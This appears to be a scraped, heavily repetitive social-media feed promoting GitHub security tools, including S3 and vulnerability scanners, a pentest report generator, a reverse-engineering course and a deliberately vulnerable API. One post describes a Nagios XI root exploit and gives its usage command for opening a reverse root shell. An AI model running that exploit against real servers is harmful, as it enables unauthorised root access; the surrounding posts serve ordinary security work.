S3Tk:-- A #Security #Toolkit For #Amazon S3.
Scan your #buckets for:-
1. #ACL open to public
2. policy open to public
3. public access blocked
4. logging enabled
5. versioning enabled
6. default #encryption enabled
#Download #Link:-
https://github.com/ankane/s3tk
S3Tk:-- A #Security #Toolkit For #Amazon S3.
Scan your #buckets for:-
1. #ACL open to public
2. policy open to public
3. public access blocked
4. logging enabled
5. versioning enabled
6. default #encryption enabled
#Download #Link:-
https://github.com/ankane/s3tk
Scan your #buckets for:-
1. #ACL open to public
2. policy open to public
3. public access blocked
4. logging enabled
5. versioning enabled
6. default #encryption enabled
#Download #Link:-
https://github.com/ankane/s3tk
S3Tk:-- A #Security #Toolkit For #Amazon S3.
Scan your #buckets for:-
1. #ACL open to public
2. policy open to public
3. public access blocked
4. logging enabled
5. versioning enabled
6. default #encryption enabled
#Download #Link:-
https://github.com/ankane/s3tk
Seccubus:-- #Easily #automated #vulnerability #scanning, #reporting, and #analysis.
#Seccubus automates regular vulnerability scans with various tools and aids #security people in the fast analysis of its output, both on the first scan and on repeated scans.
Seccubus V2 works with the following scanners:-
1. #Nessus
2. #OpenVAS
3. #Skipfish
4. #Medusa (local and remote)
5. #Nikto (local and remote)
6. #NMap (local and remote)
7. #OWASP-ZAP (local and remote)
8. #SSLyze
9. #Medusa
10. #Qualys #SSL labs
11. testssl.sh (local and remote)
#Download #Link:-
https://github.com/seccubus/seccubus
Seccubus:-- #Easily #automated #vulnerability #scanning, #reporting, and #analysis.
#Seccubus automates regular vulnerability scans with various tools and aids #security people in the fast analysis of its output, both on the first scan and on repeated scans.
Seccubus V2 works with the following scanners:-
1. #Nessus
2. #OpenVAS
3. #Skipfish
4. #Medusa (local and remote)
5. #Nikto (local and remote)
6. #NMap (local and remote)
7. #OWASP-ZAP (local and remote)
8. #SSLyze
9. #Medusa
10. #Qualys #SSL labs
11. testssl.sh (local and remote)
#Download #Link:-
https://github.com/seccubus/seccubus
#Seccubus automates regular vulnerability scans with various tools and aids #security people in the fast analysis of its output, both on the first scan and on repeated scans.
Seccubus V2 works with the following scanners:-
1. #Nessus
2. #OpenVAS
3. #Skipfish
4. #Medusa (local and remote)
5. #Nikto (local and remote)
6. #NMap (local and remote)
7. #OWASP-ZAP (local and remote)
8. #SSLyze
9. #Medusa
10. #Qualys #SSL labs
11. testssl.sh (local and remote)
#Download #Link:-
https://github.com/seccubus/seccubus
Seccubus:-- #Easily #automated #vulnerability #scanning, #reporting, and #analysis.
#Seccubus automates regular vulnerability scans with various tools and aids #security people in the fast analysis of its output, both on the first scan and on repeated scans.
Seccubus V2 works with the following scanners:-
1. #Nessus
2. #OpenVAS
3. #Skipfish
4. #Medusa (local and remote)
5. #Nikto (local and remote)
6. #NMap (local and remote)
7. #OWASP-ZAP (local and remote)
8. #SSLyze
9. #Medusa
10. #Qualys #SSL labs
11. testssl.sh (local and remote)
#Download #Link:-
https://github.com/seccubus/seccubus
nagiosxi-root-exploit:-- #POC which #exploits a #vulnerability within #Nagios XI (5.6.5) to #spawn a #root #shell
A vulnerability exists in Nagios XI <= 5.6.5 allowing an attacker to leverage an RCE to #escalate #privileges to root.
The exploit requires access to the server as the 'nagios' user, or CCM access via the web interface with permissions to manage #plugins.
A #PHP POC has been developed which #uploads a #payload resulting in a #reverse root shell.
#Usage:
php privesc.php --host=example.com --ssl=[true/false] --user=username --pass=password --reverseip=ip --reverseport=port
#Download #Link:-
https://github.com/jakgibb/nagiosxi-root-rce-exploit
nagiosxi-root-exploit:-- #POC which #exploits a #vulnerability within #Nagios XI (5.6.5) to #spawn a #root #shell
A vulnerability exists in Nagios XI
A vulnerability exists in Nagios XI <= 5.6.5 allowing an attacker to leverage an RCE to #escalate #privileges to root.
The exploit requires access to the server as the 'nagios' user, or CCM access via the web interface with permissions to manage #plugins.
A #PHP POC has been developed which #uploads a #payload resulting in a #reverse root shell.
#Usage:
php privesc.php --host=example.com --ssl=[true/false] --user=username --pass=password --reverseip=ip --reverseport=port
#Download #Link:-
https://github.com/jakgibb/nagiosxi-root-rce-exploit
nagiosxi-root-exploit:-- #POC which #exploits a #vulnerability within #Nagios XI (5.6.5) to #spawn a #root #shell
A vulnerability exists in Nagios XI
Photos from National Cyber Security Services's post
PwnDoc:-- #Pentesting #report generator.
#PwnDoc is a #pentest reporting #application making it simple and easy to write your findings and generate a customizable docx report. The main goal is to have more time to Pwn and less time to Doc by mutualizing data like #vulnerabilities between users.
#Download #Link:-
https://github.com/pwndoc/pwndoc
PwnDoc:-- #Pentesting #report generator.
#PwnDoc is a #pentest reporting #application making it simple and easy to write your findings and generate a customizable docx report. The main goal is to have more time to Pwn and less time to Doc by mutualizing data like #vulnerabilities between users.
#Download #Link:-
https://github.com/pwndoc/pwndoc
Z0FCourse_ReverseEngineering:-- #Reverse #engineering course by Z0F. Focuses on x64 #Windows.
This course is going to teach anyone how to reverse engineer x64 Windows. We will start by covering some basics of #binaries, then reverse some small samples, #reverse a #DLL and implement it into our own #program, reverse some malware, then look at some realistic situations.
#Download #Link:-
https://github.com/0xZ0F/Z0FCourse_ReverseEngineering
Z0FCourse_ReverseEngineering:-- #Reverse #engineering course by Z0F. Focuses on x64 #Windows.
This course is going to teach anyone how to reverse engineer x64 Windows. We will start by covering some basics of #binaries, then reverse some small samples, #reverse a #DLL and implement it into our own #program, reverse some malware, then look at some realistic situations.
#Download #Link:-
https://github.com/0xZ0F/Z0FCourse_ReverseEngineering
This course is going to teach anyone how to reverse engineer x64 Windows. We will start by covering some basics of #binaries, then reverse some small samples, #reverse a #DLL and implement it into our own #program, reverse some malware, then look at some realistic situations.
#Download #Link:-
https://github.com/0xZ0F/Z0FCourse_ReverseEngineering
Z0FCourse_ReverseEngineering:-- #Reverse #engineering course by Z0F. Focuses on x64 #Windows.
This course is going to teach anyone how to reverse engineer x64 Windows. We will start by covering some basics of #binaries, then reverse some small samples, #reverse a #DLL and implement it into our own #program, reverse some malware, then look at some realistic situations.
#Download #Link:-
https://github.com/0xZ0F/Z0FCourse_ReverseEngineering
Websheep:-- #Websheep is an app based on a willingly #vulnerable #ReSTful #APIs.
#Download #Link:--
https://github.com/marmicode/websheep
Websheep:-- #Websheep is an app based on a willingly #vulnerable #ReSTful #APIs.
#Download #Link:--
https://github.com/marmicode/websheep
#Download #Link:--
https://github.com/marmicode/websheep
Websheep:-- #Websheep is an app based on a willingly #vulnerable #ReSTful #APIs.
#Download #Link:--
https://github.com/marmicode/websheep